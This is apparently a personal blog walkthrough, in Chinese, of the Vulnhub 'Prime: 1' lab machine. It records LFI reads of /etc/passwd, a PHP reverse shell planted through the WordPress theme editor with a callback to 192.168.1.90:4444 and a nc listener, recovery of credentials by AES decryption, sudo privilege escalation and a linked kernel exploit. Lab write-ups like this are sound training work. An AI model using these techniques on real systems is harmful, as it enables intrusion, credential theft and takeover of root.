Sunday, September 8, 2019

Vulnhub Prime: 1

来源: https://www.vulnhub.com/entry/prime-1,358/

nmap version check:
  • 22/tcp OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  • 80/tcp Apache httpd 2.4.18 ((Ubuntu))
尝试 gobuster/nikto/dirb 扫描

/image.php
/index.php
/secret.txt





请求某个 php 页面, 参数 secrettier360

尝试 LFI, 请求 /etc/passwd
为了显示方便, 这里只 grep 了需要的部分 请求对应的 password.txt
密码 follow_the_ippsec
ippsec? youtube 的一个安全教程相关的频道

多次尝试[1], 发现是 wordpress victor 的密码

wordpress 用户名 victor 密码 follow_the_ippsec

多次尝试[2], 在 Appearance->Theme Editor 找到一个可以写入的文件 secret.php

使用 webshells 包的 php/php-reverse-shell.php, 修改 LHOST/LPORT:

 $ip = '192.168.1.90';
 $port = 4444;

本地 terminal 设置 `nc -n -v -l -p 4444`

拿到 unstable limited reverse shell

victor 在 sudo 组

privilege escalation

  • 破解 AES 密码, sudo 提权
  • 利用内核漏洞提权
method 1:
执行 /home/saket/enc, 提示密码, 尝试几个简单的密码[3], 没有成功
目录遍历的时候, /opt/backup/server_database 找到两个奇怪的文件
另外一个是空文件 {hello.8} 再次执行 /home/saket/enc, 密码 backup_password

提取出 enc.txt 和 key.txt
又是 ippsec

多次尝试, https://www.devglan.com/online-tools/aes-encryption-decryption

Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==> "tribute_to_ippsec"Victor,

ssh 用户名 saket, 密码 tribute_to_ippsec
/home/victor/undefeated_victor 会执行 /tmp/challenge 创建 /tmp/challenge
拿到 root 权限 proof

method 2:

https://www.hackingarticles.in/prime-1-vulnhub-walkthrough/

https://www.rapid7.com/db/modules/exploit/linux/local/bpf_sign_extension_priv_esc

https://raw.githubusercontent.com/rlarabee/exploits/db64753f2335a01825f78d66665adfff3670653e/cve-2017-16995/cve-2017-16995.c



description:
This machine is designed for those one who is trying to prepare for OSCP or OSCP-Exam.
其实 offsec pdf/lab 都里面没有提到 AES 解密..

TODO:
1. 排版
2. footnote

No comments:

Post a Comment